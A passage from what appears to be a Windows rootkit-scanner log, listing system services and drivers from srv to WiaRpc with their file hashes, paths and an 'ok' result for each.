20:03:08.0777 0x0b14  srv - ok
20:03:08.0856 0x0b14  [ 00D8AC8E3053290BDE6EA2FB6810D2FC, 957FEF84CBBAE71829529AE99A1B24F52D7831BD666442D0132FBB825409A75D ] srv2            C:\WINDOWS\system32\DRIVERS\srv2.sys
20:03:08.0902 0x0b14  srv2 - ok
20:03:08.0949 0x0b14  [ D047CD668E6277FD80F0C613946F034C, BD0209E7FD89F9295D4DE48C9652DF2A2990277C16AFA473B96704B1CBD2F338 ] srvnet          C:\WINDOWS\system32\DRIVERS\srvnet.sys
20:03:08.0965 0x0b14  srvnet - ok
20:03:09.0027 0x0b14  [ CF6C3037839CF78421A94F9060C2886F, CA98C180AE03F5BE8FEFFBA75BD98DEE2AD4FA975E1EF83215C9CD2476946811 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll
20:03:09.0043 0x0b14  SSDPSRV - ok
20:03:09.0090 0x0b14  [ 198A737DBA666F4808D62E9A8277A6B7, 90B6E5E2ACE95D850C913A3A1DA1F966C44955C530004C228FA93B2A536F5C27 ] SstpSvc         C:\WINDOWS\system32\sstpsvc.dll
20:03:09.0121 0x0b14  SstpSvc - ok
20:03:09.0184 0x0b14  [ 366DEA74BBA65B362BCCFC6FC2ADFD8B, 4D28122AB9D8DAB724021E6513B4474BD34FCEDF47769B1D27AC7551FCA002F8 ] stexstor        C:\WINDOWS\system32\drivers\stexstor.sys
20:03:09.0199 0x0b14  stexstor - ok
20:03:09.0293 0x0b14  [ 63E9CE568CF1192771A5F0460DE7D2B9, C27B21FD2C14AD41A59EF62EB8AC95C08EB13CCB1CEECD8378B8CDD4DC352E69 ] stisvc          C:\WINDOWS\System32\wiaservc.dll
20:03:09.0356 0x0b14  stisvc - ok
20:03:09.0403 0x0b14  [ 0ED2E318ABB68C1A35A8B8038BDB4C90, 5C3ABC245F4BCFE64E646D9C0E2F5E211244956C84D03084C71FF6A7E0CDED30 ] storahci        C:\WINDOWS\system32\drivers\storahci.sys
20:03:09.0418 0x0b14  storahci - ok
20:03:09.0465 0x0b14  [ 8B9486B64E5FC17FB9CC04CA10B77A34, C1EAC9D27DC83E4C56B890D97988C3CCFAE3877309610601F2E3FFFE97686D43 ] storflt         C:\WINDOWS\system32\drivers\vmstorfl.sys
20:03:09.0496 0x0b14  storflt - ok
20:03:09.0559 0x0b14  [ 6B06E2D11E604BE2B1A406C4CB3B90DE, 2DDEA1568A85AD64FCE5D10D348304FCD9BE6E96C2313353EF70A2933306D188 ] stornvme        C:\WINDOWS\system32\drivers\stornvme.sys
20:03:09.0606 0x0b14  stornvme - ok
20:03:09.0687 0x0b14  [ A45F5AC9D8069D0EC66E3CA73103073B, 996788F1C58E016E8E5CF3FD1D220A3C40AFFD6C21361A34636415DB12E0D381 ] StorSvc         C:\WINDOWS\system32\storsvc.dll
20:03:09.0718 0x0b14  StorSvc - ok
20:03:09.0749 0x0b14  [ 548759755BC73DAD663250239D7E0B9F, D31A05A8CE800B539420B6E545F1F4BF6E4B02EAF8366DE89CAF13A83C6CA48D ] storvsc         C:\WINDOWS\system32\drivers\storvsc.sys
20:03:09.0765 0x0b14  storvsc - ok
20:03:09.0812 0x0b14  [ E395BE02F80A79A6CF973BA38DBB8135, 4C6F85B0EB8E7725BA720F9742561D229726C0D7C17505D1E79F19A5626F6325 ] svsvc           C:\WINDOWS\system32\svsvc.dll
20:03:09.0827 0x0b14  svsvc - ok
20:03:09.0843 0x0b14  [ 65454187E0F8B6C0DCECB0287D06EC43, 87550000CF5B3C1DF3E69633934AFE8554AE40B6638F190D3185AD63F1D7A2EE ] swenum          C:\WINDOWS\System32\drivers\swenum.sys
20:03:09.0859 0x0b14  swenum - ok
20:03:09.0921 0x0b14  [ 1C71D72D4997A284128FBEE770726330, 21682BDE74A1108FED1124FB1EA35A03CBFA94ABE1B89CC0FADB4DD82596C43E ] swprv           C:\WINDOWS\System32\swprv.dll
20:03:09.0968 0x0b14  swprv - ok
20:03:10.0046 0x0b14  [ 1C9BC67929C728DED1091CA19C3F7D41, 78C7EA28E339FCDBD74470938298E33AB41A14CEE967E1B82CE1D11C54594135 ] SynTP           C:\WINDOWS\system32\DRIVERS\SynTP.sys
20:03:10.0093 0x0b14  SynTP - ok
20:03:10.0218 0x0b14  [ 3114CB46C2853CA71525428CB0C7CB58, A9CC51506AABBC23BAB2B90E30AB13197A72268A3DE6D2F281C1C367ED7118AE ] SysMain         C:\WINDOWS\system32\sysmain.dll
20:03:10.0296 0x0b14  SysMain - ok
20:03:10.0359 0x0b14  [ D73DBBB96CEE90C2856164AAD8543425, D11ADB5D4C5DD355314CA656D375D0062CAE7462E866F94F1B26D5803F65DCB2 ] SystemEventsBroker C:\WINDOWS\System32\SystemEventsBrokerServer.dll
20:03:10.0374 0x0b14  SystemEventsBroker - ok
20:03:10.0437 0x0b14  [ D6A71B95ACF71ACA63B67232059F1BCD, C5CEC032E7AB507500D1CC7A4E65DA6322412C798201A9D770CBDE892E50DFC8 ] TabletInputService C:\WINDOWS\System32\TabSvc.dll
20:03:10.0452 0x0b14  TabletInputService - ok
20:03:10.0499 0x0b14  [ 5A5BAB1CA9621E73E25EE4744B67CDA6, 479EBD7BAE1E2AD431153FDC016742F7A8D824716EAB1A4CA87EBBD21D61DECD ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll
20:03:10.0546 0x0b14  TapiSrv - ok
20:03:10.0734 0x0b14  [ 468273F7089A3A33D149955F0F203FA4, 18FD0B73FBD63550E904EE76D4323EFE163BFF8C3DC6DE67F4BE6003C7DC6879 ] Tcpip           C:\WINDOWS\system32\drivers\tcpip.sys
20:03:10.0874 0x0b14  Tcpip - ok
20:03:11.0046 0x0b14  [ 468273F7089A3A33D149955F0F203FA4, 18FD0B73FBD63550E904EE76D4323EFE163BFF8C3DC6DE67F4BE6003C7DC6879 ] TCPIP6          C:\WINDOWS\system32\DRIVERS\tcpip.sys
20:03:11.0171 0x0b14  TCPIP6 - ok
20:03:11.0249 0x0b14  [ 41CF802064F72E55F50CA0A221FD36D4, 70ABCDF9E96611E8C83042C581575E26649FE479475E8E118CD3FF6CB1C84C3F ] tcpipreg        C:\WINDOWS\system32\drivers\tcpipreg.sys
20:03:11.0265 0x0b14  tcpipreg - ok
20:03:11.0328 0x0b14  [ FFF28F9F6823EB1756C60F1649560BBF, 208DFF8BF0329D0D4761C7E31527AEED7FF5F3C36C5005953D01477F35408D5C ] tdx             C:\WINDOWS\system32\DRIVERS\tdx.sys
20:03:11.0359 0x0b14  tdx - ok
20:03:11.0390 0x0b14  [ 232D185D2337F141311D0CF1983E1431, 02EB56D3F26174AF1741C1A444CE30DE84D5BAF583C1A52C7A953BCC52445547 ] terminpt        C:\WINDOWS\System32\drivers\terminpt.sys
20:03:11.0406 0x0b14  terminpt - ok
20:03:11.0531 0x0b14  [ C50997E282576DA492EBA66B059D4196, EBD793CB396F9503376207FA60353F5672DEDB620C8E01C8D6AE0030B3B03339 ] TermService     C:\WINDOWS\System32\termsrv.dll
20:03:11.0624 0x0b14  TermService - ok
20:03:11.0661 0x0b14  [ 2180DBCE75B914E5E5BBFFFAAE97AA21, 8000AECC8855903DB50ABA7E304396D1FCEAE8DC9ADD4FC50275CF24B4D914DE ] Themes          C:\WINDOWS\system32\themeservice.dll
20:03:11.0661 0x0b14  Themes - ok
20:03:11.0724 0x0b14  [ 4C5179DB61B9E14BEC15CDC4B152B2E9, 9048BEC7AD6A3F4B640E99B1F0365AC9A46740B188758FBB2C160EF30AD6E64B ] THREADORDER     C:\WINDOWS\system32\mmcss.dll
20:03:11.0724 0x0b14  THREADORDER - ok
20:03:11.0786 0x0b14  [ B5ED9CC61798C7D44BD535D40B89EFB5, 1BDCEAA9AF2096381870D92129C748F4EE06A1167ABA9367B9DD43BAF27E3F5B ] TimeBroker      C:\WINDOWS\System32\TimeBrokerServer.dll
20:03:11.0802 0x0b14  TimeBroker - ok
20:03:11.0912 0x0b14  [ 82F909359600D3603FE852DB7F135626, 2EB2BB9D81AC9A2E432B2628E296B7B21F1C82EAE8009300EEF1B8596A9F418D ] TPM             C:\WINDOWS\system32\drivers\tpm.sys
20:03:11.0958 0x0b14  TPM - ok
20:03:12.0005 0x0b14  [ 884113C2BB703FE806C8608B75F34831, 24DE5750CA4363455412BABB0B1FAB08497153E8F158ED44958F100410F93506 ] TrkWks          C:\WINDOWS\System32\trkwks.dll
20:03:12.0021 0x0b14  TrkWks - ok
20:03:12.0099 0x0b14  [ 44A94FB4C76528D2382FFE04B05827C3, B0BCDF7CD1D65E61A9061D539D83527A89B69583958F8A26C6BF9766C1B61E0C ] TrustedInstaller C:\WINDOWS\servicing\TrustedInstaller.exe
20:03:12.0099 0x0b14  TrustedInstaller - ok
20:03:12.0146 0x0b14  [ BF8F54CA37E9C9D6582C31C5761F8C93, 337C566792F6FB9B7FD5D1D4384B767CFE4CF5DBB2E4688CCC36CBB018A0DD0F ] TsUsbFlt        C:\WINDOWS\system32\drivers\tsusbflt.sys
20:03:12.0162 0x0b14  TsUsbFlt - ok
20:03:12.0209 0x0b14  [ 20185BEB7512EDE4EFECDFA148AC9F99, 6F539478493C0F87F3DDF67A4A6D4D41E9474EEF21434E856350CE149A34EA9F ] TsUsbGD         C:\WINDOWS\System32\drivers\TsUsbGD.sys
20:03:12.0224 0x0b14  TsUsbGD - ok
20:03:12.0255 0x0b14  [ C8E0E78B5D284C2FF59BDFFDAF997242, BA1576C491A1246EF9866762426D110F4570F9DB42A68C174943C7D5020FE3E2 ] tunnel          C:\WINDOWS\system32\DRIVERS\tunnel.sys
20:03:12.0287 0x0b14  tunnel - ok
20:03:12.0333 0x0b14  [ F6EEAD052943B5A3104C1405BB856C54, FE422813E6C1012E9F392EFF2AE4C6D3A4DBD9CB2BD5E6A5CAB57D4E89A29468 ] uagp35          C:\WINDOWS\system32\drivers\uagp35.sys
20:03:12.0365 0x0b14  uagp35 - ok
20:03:12.0396 0x0b14  [ FE6067B1FD4E63650C667B33D080565B, 2C330ED00E49BA55E25564230E0DFB8A35F2B5320EB18D4AF7CAACFA9A449044 ] UASPStor        C:\WINDOWS\System32\drivers\uaspstor.sys
20:03:12.0412 0x0b14  UASPStor - ok
20:03:12.0505 0x0b14  [ 807F8CF3E973305FC435C61CBBEE2A49, 43CDEAC2BFC5091C11DFC0E7F7171AF9A598AE56CB056C3CF382AE7807F79EF0 ] UCX01000        C:\WINDOWS\System32\drivers\ucx01000.sys
20:03:12.0537 0x0b14  UCX01000 - ok
20:03:12.0583 0x0b14  [ C61EAF8E1E4B2F62BA4FDF457440B2C6, 961F76A789925234AC27F56AAE34556FA06088D71580B42C24B0BC209EAFD67E ] udfs            C:\WINDOWS\system32\DRIVERS\udfs.sys
20:03:12.0615 0x0b14  udfs - ok
20:03:12.0630 0x0b14  [ 9578691F297E1B1F519970FE6D47CB21, 080C352AAF22A16A4F3C4AB4DCEA5BFA656457C73F735CEBA30516FDACCF6301 ] UEFI            C:\WINDOWS\System32\drivers\UEFI.sys
20:03:12.0646 0x0b14  UEFI - ok
20:03:12.0709 0x0b14  [ A867F0F978EE64C87FADC3B100869EE4, 2686BE85F963D0D0BB275E92E5B543280D8742CF10772303E3189D0719B6A277 ] UI0Detect       C:\WINDOWS\system32\UI0Detect.exe
20:03:12.0724 0x0b14  UI0Detect - ok
20:03:12.0771 0x0b14  [ 5EAB5117DDB24FC4D39E6FFFCF1837B9, 2BC709240867F161E94BE6625A04F478EAAA3EEE7BC7C37ED0DFA9EEA5928E98 ] uliagpkx        C:\WINDOWS\system32\drivers\uliagpkx.sys
20:03:12.0787 0x0b14  uliagpkx - ok
20:03:12.0833 0x0b14  [ DA34C39A18E60E7C3FA0630566408034, 2F162504214053894C72760D9933D01DBF3578609FE5E2376C3272818599FE32 ] umbus           C:\WINDOWS\System32\drivers\umbus.sys
20:03:12.0849 0x0b14  umbus - ok
20:03:12.0865 0x0b14  [ AE8294875E5446E359B1E8035D40C05E, AE0357BAB47C07C3576BC76951CD258C009BC5A1B93259D2122A841BD9CDA8FA ] UmPass          C:\WINDOWS\System32\drivers\umpass.sys
20:03:12.0880 0x0b14  UmPass - ok
20:03:12.0943 0x0b14  [ A023F267A262D5DA6CE1436D9C5E8FD9, 92AD7AF91184C244A7E392F49663143193A80D5D81114546A00F18227DE31D23 ] UmRdpService    C:\WINDOWS\System32\umrdp.dll
20:03:12.0990 0x0b14  UmRdpService - ok
20:03:13.0052 0x0b14  [ C98493DD8E6A50154FAC75C15E1C36BB, CECD1C826C8F7AF05468871BF6A0ACDBB6B0202F4F87F48C6D367E5BD699E800 ] upnphost        C:\WINDOWS\System32\upnphost.dll
20:03:13.0083 0x0b14  upnphost - ok
20:03:13.0130 0x0b14  [ FF78D053A05E5A394F4E3C1816CC65A8, 5DAE02414271231F5FDBB751AFEB99874779B467947020815D4AE54432D4269D ] usbccgp         C:\WINDOWS\System32\drivers\usbccgp.sys
20:03:13.0162 0x0b14  usbccgp - ok
20:03:13.0240 0x0b14  [ 0139248F6B95CF0D837B5B46A2722D40, 38E3E704E0364F07732DB418AEBD126B040FB3CDB7D78EA36E8605D50D528A80 ] usbcir          C:\WINDOWS\System32\drivers\usbcir.sys
20:03:13.0255 0x0b14  usbcir - ok
20:03:13.0318 0x0b14  [ 48BA326A3DBA5B5BEB5F2777F4618696, B9EC8155F11A3A7644BD9DC8910681B46AE44AE3BF53F052DF50E9C5555E3229 ] usbehci         C:\WINDOWS\System32\drivers\usbehci.sys
20:03:13.0349 0x0b14  usbehci - ok
20:03:13.0380 0x0b14  [ 4875DC63E548812C75D4FDEF84970C89, 6A29306BAB6F95F0384E16533A9588A654A6E3CFC35D55A4CEB2B14EF34EEE19 ] usbfilter       C:\WINDOWS\system32\DRIVERS\usbfilter.sys
20:03:13.0396 0x0b14  usbfilter - ok
20:03:13.0521 0x0b14  [ FEF0BC107812B36849741C3211BA6B60, B3EF738BE1E6B6027F29C9713CD3F367EA067D2BE46580AFBC0FB58046EF6BBD ] usbhub          C:\WINDOWS\System32\drivers\usbhub.sys
20:03:13.0568 0x0b14  usbhub - ok
20:03:13.0709 0x0b14  [ 95B0179BDA907252025DEEA183699FB3, A6BDFB93EE9418A83407024204A41640A08638C60E2BE75C249D102601DC1D80 ] USBHUB3         C:\WINDOWS\System32\drivers\UsbHub3.sys
20:03:13.0741 0x0b14  USBHUB3 - ok
20:03:13.0803 0x0b14  [ 3019097FB6C985EF24C058090FF3BDBD, 24AC518D34E338D94BF3D5B3F72E53F8A1369BAA7F32FEA3EDBCF928C4FF1D17 ] usbohci         C:\WINDOWS\System32\drivers\usbohci.sys
20:03:13.0819 0x0b14  usbohci - ok
20:03:13.0881 0x0b14  [ 4D655E3B684BE9B0F7FFD8A2935C348C, 3A7FC1748C5AEA8CFE0E7C22ADC77E3DCA475455FC16D9C6A5C16EB5E949A516 ] usbprint        C:\WINDOWS\System32\drivers\usbprint.sys
20:03:13.0897 0x0b14  usbprint - ok
20:03:13.0959 0x0b14  [ 66732C13628BDB1AB0D6FD46027327C2, B582C0F348D8F79419CA5A58F10CA151E06D7CA3BE162344CADA46D9D7FED97C ] USBSTOR         C:\WINDOWS\System32\drivers\USBSTOR.SYS
20:03:13.0991 0x0b14  USBSTOR - ok
20:03:14.0022 0x0b14  [ 064260B3A5868AC894A4943543BC7AB7, D3534E98B34C4AC9A430D7E0AB301A0E5E1511E3117C2FEA392636B0DE2C38E2 ] usbuhci         C:\WINDOWS\System32\drivers\usbuhci.sys
20:03:14.0053 0x0b14  usbuhci - ok
20:03:14.0147 0x0b14  [ 5C8F604F6DC74177CDD8372D7B1ADFF0, C1DE9A37A7A01CCCBFCE13C1E5B26683F620AB21EDA5A14C82022E2F49C84484 ] usbvideo        C:\WINDOWS\System32\Drivers\usbvideo.sys
20:03:14.0178 0x0b14  usbvideo - ok
20:03:14.0303 0x0b14  [ 44603DA5A87FB491EF59C889EBBB4DDB, 59AA9B6B0B5D66F9312CD3F999D0D9F12F1A2C5D230365AD7287CD71FD86961C ] USBXHCI         C:\WINDOWS\System32\drivers\USBXHCI.SYS
20:03:14.0334 0x0b14  USBXHCI - ok
20:03:14.0381 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] VaultSvc        C:\WINDOWS\system32\lsass.exe
20:03:14.0381 0x0b14  VaultSvc - ok
20:03:14.0428 0x0b14  [ FEB26E3B8345A7E8D62F945C4AE86562, 3AAFE87C402FC8E92542DFE60EC9540559863065F88D429A16D7B1BF829223FF ] vdrvroot        C:\WINDOWS\system32\drivers\vdrvroot.sys
20:03:14.0428 0x0b14  vdrvroot - ok
20:03:14.0569 0x0b14  [ 8A4D808D1EC7C1C47B2C8BF488A9A07A, 63C07312ADB6F8A8BDE93361C30AC63DAB4DE1141AF54630EEF11E54B0BF983D ] vds             C:\WINDOWS\System32\vds.exe
20:03:14.0663 0x0b14  vds - ok
20:03:14.0678 0x0b14  [ A026EDEAA5EECAE0B08E2748B616D4BD, 2525A54DC7F49DDFBB999C22BF3FAB6D9E9F70C0806E58D81E90AC59F9F46089 ] VerifierExt     C:\WINDOWS\system32\drivers\VerifierExt.sys
20:03:14.0710 0x0b14  VerifierExt - ok
20:03:14.0913 0x0b14  [ C06E8481E068F170A258441639AC5792, 2F550530BACB511A195D5047F003B01CB6E04FA9A0DCCF638CB3D51FF5467DC7 ] vhdmp           C:\WINDOWS\System32\drivers\vhdmp.sys
20:03:15.0116 0x0b14  vhdmp - ok
20:03:15.0147 0x0b14  [ 06D38968028E9AB19DE9B618C7B6D199, 62022297A47F440D1C82CA0B0E57C0C8E9D5033D83DD3B40492B218DF65EBF68 ] viaide          C:\WINDOWS\system32\drivers\viaide.sys
20:03:15.0163 0x0b14  viaide - ok
20:03:15.0210 0x0b14  [ 511AD3FF957A0127E6BD336FF6F89C38, 55325BFD0857A1204F7F6F8ED8C91C07B0E20A50402105708E7365ECD9E25A21 ] vmbus           C:\WINDOWS\system32\drivers\vmbus.sys
20:03:15.0241 0x0b14  vmbus - ok
20:03:15.0256 0x0b14  [ DA40BEA0A863CE768C940CA9723BF81F, 567C0C3F422325635808B0CF76E05D3B6187F96845C33F85F92F98C9FE53A5B8 ] VMBusHID        C:\WINDOWS\System32\drivers\VMBusHID.sys
20:03:15.0272 0x0b14  VMBusHID - ok
20:03:15.0350 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicguestinterface C:\WINDOWS\System32\ICSvc.dll
20:03:15.0397 0x0b14  vmicguestinterface - ok
20:03:15.0444 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicheartbeat   C:\WINDOWS\System32\ICSvc.dll
20:03:15.0475 0x0b14  vmicheartbeat - ok
20:03:15.0506 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmickvpexchange C:\WINDOWS\System32\ICSvc.dll
20:03:15.0538 0x0b14  vmickvpexchange - ok
20:03:15.0585 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicrdv         C:\WINDOWS\System32\ICSvc.dll
20:03:15.0616 0x0b14  vmicrdv - ok
20:03:15.0647 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicshutdown    C:\WINDOWS\System32\ICSvc.dll
20:03:15.0681 0x0b14  vmicshutdown - ok
20:03:15.0727 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmictimesync    C:\WINDOWS\System32\ICSvc.dll
20:03:15.0759 0x0b14  vmictimesync - ok
20:03:15.0790 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicvss         C:\WINDOWS\System32\ICSvc.dll
20:03:15.0821 0x0b14  vmicvss - ok
20:03:15.0884 0x0b14  [ 55D7D963DE85162F1C49721E502F9744, 5AD34D6DB707EF3E5242BD8CA67B21D6258EE7E7FC477D5227BD15500AE7F45F ] volmgr          C:\WINDOWS\system32\drivers\volmgr.sys
20:03:15.0899 0x0b14  volmgr - ok
20:03:15.0931 0x0b14  [ CCB9E901F7254BF96D28EB1B0E5329B7, F0E3CA4EFA544CDAEF4092284CF3EC7DF07F806A770285E281816457AD8813F5 ] volmgrx         C:\WINDOWS\system32\drivers\volmgrx.sys
20:03:15.0946 0x0b14  volmgrx - ok
20:03:16.0009 0x0b14  [ 64CA2B4A49A8EAF495E435623ECCE7DB, 81151F295A54DE2B8B88C7F48C86BF58CDFF96F98493509C06D6F41484594386 ] volsnap         C:\WINDOWS\system32\drivers\volsnap.sys
20:03:16.0040 0x0b14  volsnap - ok
20:03:16.0087 0x0b14  [ EF31713EE4C7CCFE4049F7E7F15645A2, 35D198D3F1061E19A7EF89FA1E75377049CD6BCA9702F8076B9F95BB8737E0D4 ] vpci            C:\WINDOWS\System32\drivers\vpci.sys
20:03:16.0102 0x0b14  vpci - ok
20:03:16.0165 0x0b14  [ 4539F45F9F4C9757A86A56C949421E07, DEC362314B2C66414F39354AFE79C02B18BF4EEF90787FB58307F6EB62237E2C ] vsmraid         C:\WINDOWS\system32\drivers\vsmraid.sys
20:03:16.0196 0x0b14  vsmraid - ok
20:03:16.0321 0x0b14  [ 94FAFD473CDD80CE19A21FB9503D7ED1, 953E5E8C753C0017E1258695A76F60CC05D283F7476B9D9C5C8AC78B8E3FCE18 ] VSS             C:\WINDOWS\system32\vssvc.exe
20:03:16.0399 0x0b14  VSS - ok
20:03:16.0478 0x0b14  [ 0849B7260F26FE05EA56DED0672E2F4B, 7EAC0E7988F45CB4133A15932955B7B03CE715C967A3BAC9999D81543EBCAEC5 ] VSTXRAID        C:\WINDOWS\system32\drivers\vstxraid.sys
20:03:16.0524 0x0b14  VSTXRAID - ok
20:03:16.0571 0x0b14  [ BE970C369E43B509C1EDA2B8FA7CECB0, 18951F2AA842A0795AA79A4E164EE925A35E6270EBE4C4CDB19D0A891830E383 ] vwifibus        C:\WINDOWS\System32\drivers\vwifibus.sys
20:03:16.0587 0x0b14  vwifibus - ok
20:03:16.0618 0x0b14  [ 6B26AD573CCDD5209DF4397438B76354, 2C8AC314EC471F6D8B0B12D49D621360A10DCADA7C52E73596730C954FF89FCF ] vwififlt        C:\WINDOWS\system32\DRIVERS\vwififlt.sys
20:03:16.0634 0x0b14  vwififlt - ok
20:03:16.0665 0x0b14  [ 0B48E0DFB44EE475F4FD8A8EE599AF30, 28271D4CA0C642304CD8826A3D514F44E3391F9D6D07A1595BB30CE65E7E3494 ] vwifimp         C:\WINDOWS\system32\DRIVERS\vwifimp.sys
20:03:16.0681 0x0b14  vwifimp - ok
20:03:16.0743 0x0b14  [ DC821E811EFBB65CDD77FBB8B6ECA385, B7C8AACDF81DBA298F2F384983D36B269876C31F0398D89BF9070217A069B96F ] W32Time         C:\WINDOWS\system32\w32time.dll
20:03:16.0774 0x0b14  W32Time - ok
20:03:16.0884 0x0b14  [ 8E553C859C83784DEC08B10AFC3EAC92, 41D8DBA1500DBD3AC9783169ACF545805EF05069F12866238992A30794369254 ] w3logsvc        C:\WINDOWS\system32\inetsrv\w3logsvc.dll
20:03:16.0931 0x0b14  w3logsvc - ok
20:03:16.0978 0x0b14  [ 0910AB9ED404C1434E2D0376C2AD5D8B, 62585CA5F1375BDA440D28D5DF1ADDC9DE3DDFA196D49BBFF3456A5A09EE1C6B ] WacomPen        C:\WINDOWS\System32\drivers\wacompen.sys
20:03:17.0009 0x0b14  WacomPen - ok
20:03:17.0087 0x0b14  [ 9BAE40BD31E3EE0B0C70BEF167E0A2BC, 2419AC815C95F2629E1832973501983D06F788728755605D42D6C8565C3CBBF1 ] WAS             C:\WINDOWS\system32\inetsrv\iisw3adm.dll
20:03:17.0134 0x0b14  WAS - ok
20:03:17.0290 0x0b14  [ A81988DCC4FA440AA88B84CA452F5E22, 3573AAA09971E8ADB6FEFA778E02B2D8EE5E4249267CF37A524D9F019CC836FB ] wbengine        C:\WINDOWS\system32\wbengine.exe
20:03:17.0431 0x0b14  wbengine - ok
20:03:17.0524 0x0b14  [ 0F1DFA2FED73FA78B8C3CDE332A870F6, 1089F6F585F5350D349A640EBD3117832DF6B3657EB6667CB00AE217E04ACA17 ] WbioSrvc        C:\WINDOWS\System32\wbiosrvc.dll
20:03:17.0556 0x0b14  WbioSrvc - ok
20:03:17.0587 0x0b14  [ 0EAEC313B24837613621B4A2536ED382, 61C194ED7FA7D65BBE61A546D5FCA52F52AB08324E084D3EC23C9706E9BF0175 ] Wcmsvc          C:\WINDOWS\System32\wcmsvc.dll
20:03:17.0618 0x0b14  Wcmsvc - ok
20:03:17.0682 0x0b14  [ F6B4C2280FF7C7156AC8A4687B9DA35E, 1899D584D7469BB49355D84080051E2575B033E6312009D9C6C1DD3F7F9AA4C5 ] wcncsvc         C:\WINDOWS\System32\wcncsvc.dll
20:03:17.0730 0x0b14  wcncsvc - ok
20:03:17.0762 0x0b14  [ B7BF1D783F5B2484E8CE1C0C78257F16, 468601199FCCF63DBAE86EE6B8825EA85B2A1EE177413353FFA2CC9CA5249FCD ] WcsPlugInService C:\WINDOWS\System32\WcsPlugInService.dll
20:03:17.0793 0x0b14  WcsPlugInService - ok
20:03:17.0840 0x0b14  [ 1751F6B031ADAC34724511057D2E455D, BCBC77DE02718868302F7469E8FBB8F2E7E0F8A5D3E46A5B4D48713E829FBAF6 ] WdBoot          C:\WINDOWS\system32\drivers\WdBoot.sys
20:03:17.0840 0x0b14  WdBoot - ok
20:03:17.0949 0x0b14  [ CB6C63FF8342B467E2EF76E98D5B934D, BE017CE91E3BAB293DE6ECF143797CCE3F33CC63024437472B4E38C6961AD884 ] Wdf01000        C:\WINDOWS\system32\drivers\Wdf01000.sys
20:03:17.0996 0x0b14  Wdf01000 - ok
20:03:18.0059 0x0b14  [ D296D0F0DB2CD1504F90405603664493, 9531034AE2E027B5C7366713AA9003085501800B35F971D1CE7FFB8E5DAE3825 ] WdFilter        C:\WINDOWS\system32\drivers\WdFilter.sys
20:03:18.0074 0x0b14  WdFilter - ok
20:03:18.0137 0x0b14  [ F581F9C9D6953FABFA24E67105F0B614, 5A7BB72523D1C53BBE68700537D7AE0D150BC7E4B8227A916B2E29EE4CA267A9 ] WdiServiceHost  C:\WINDOWS\system32\wdi.dll
20:03:18.0137 0x0b14  WdiServiceHost - ok
20:03:18.0152 0x0b14  [ F581F9C9D6953FABFA24E67105F0B614, 5A7BB72523D1C53BBE68700537D7AE0D150BC7E4B8227A916B2E29EE4CA267A9 ] WdiSystemHost   C:\WINDOWS\system32\wdi.dll
20:03:18.0168 0x0b14  WdiSystemHost - ok
20:03:18.0199 0x0b14  [ 9F4DF0043965808973023A9B51A11136, 3A799125CBC5C214D9FBB91C348B39563B1FDB7403B520270752E9A177464723 ] WdNisDrv        C:\WINDOWS\system32\Drivers\WdNisDrv.sys
20:03:18.0215 0x0b14  WdNisDrv - ok
20:03:18.0277 0x0b14  WdNisSvc - ok
20:03:18.0324 0x0b14  [ 185E4111627F7AA6799E1366B5E91D65, 7A02C816DFBCCF47EDB49E5E2005A3D0B80719FAC94F9298D2DBAC63950EDA05 ] WebClient       C:\WINDOWS\System32\webclnt.dll
20:03:18.0371 0x0b14  WebClient - ok
20:03:18.0418 0x0b14  [ 384E1D04FE20845B2559D292F17A9FA1, AD3B0B2B2219691AC30FEEC8AFDB3BBB74B51BB7D02038AE2B4DEA514E245315 ] Wecsvc          C:\WINDOWS\system32\wecsvc.dll
20:03:18.0465 0x0b14  Wecsvc - ok
20:03:18.0512 0x0b14  [ 455014F4E48B67EBE0F032E2B0E06BF2, A36435784A034B27056A0E606683A20C69F1B0AB2B6BAEDEAEAA190F6287CAEF ] WEPHOSTSVC      C:\WINDOWS\system32\wephostsvc.dll
20:03:18.0543 0x0b14  WEPHOSTSVC - ok
20:03:18.0574 0x0b14  [ F13DBA57CEA9B7074B95EDCA6AD2635E, 1D9BA4841EF1343A5D9096B5FE27FC65DC1901D6683DD13516171638549666B5 ] wercplsupport   C:\WINDOWS\System32\wercplsupport.dll
20:03:18.0590 0x0b14  wercplsupport - ok
20:03:18.0621 0x0b14  [ FD7E58B6AA3EABF2D12B9762A20E11E4, 4C5E2E246C5C70074866BB3DBC2AAF483ECE4345004CCB8D1FE285047268685D ] WerSvc          C:\WINDOWS\System32\WerSvc.dll
20:03:18.0637 0x0b14  WerSvc - ok
20:03:18.0668 0x0b14  [ BAB713B409258DB7B5D9F9693F802B0E, C0D0391EC4FDC07E0A07F4EEB2DC9CC5B2BE5D2E292E7D01929E8D39D6F73EA5 ] WFPLWFS         C:\WINDOWS\system32\DRIVERS\wfplwfs.sys
20:03:18.0684 0x0b14  WFPLWFS - ok
20:03:18.0731 0x0b14  [ 8C840E1FD7584E74BD0CC1EA581EC187, 148E534A94B4882E7396B13FABE17407802292E7890713540080D03D5629C81D ] WiaRpc          C:\WINDOWS\System32\wiarpc.dll
20:03:18.0762 0x0b14  WiaRpc - ok
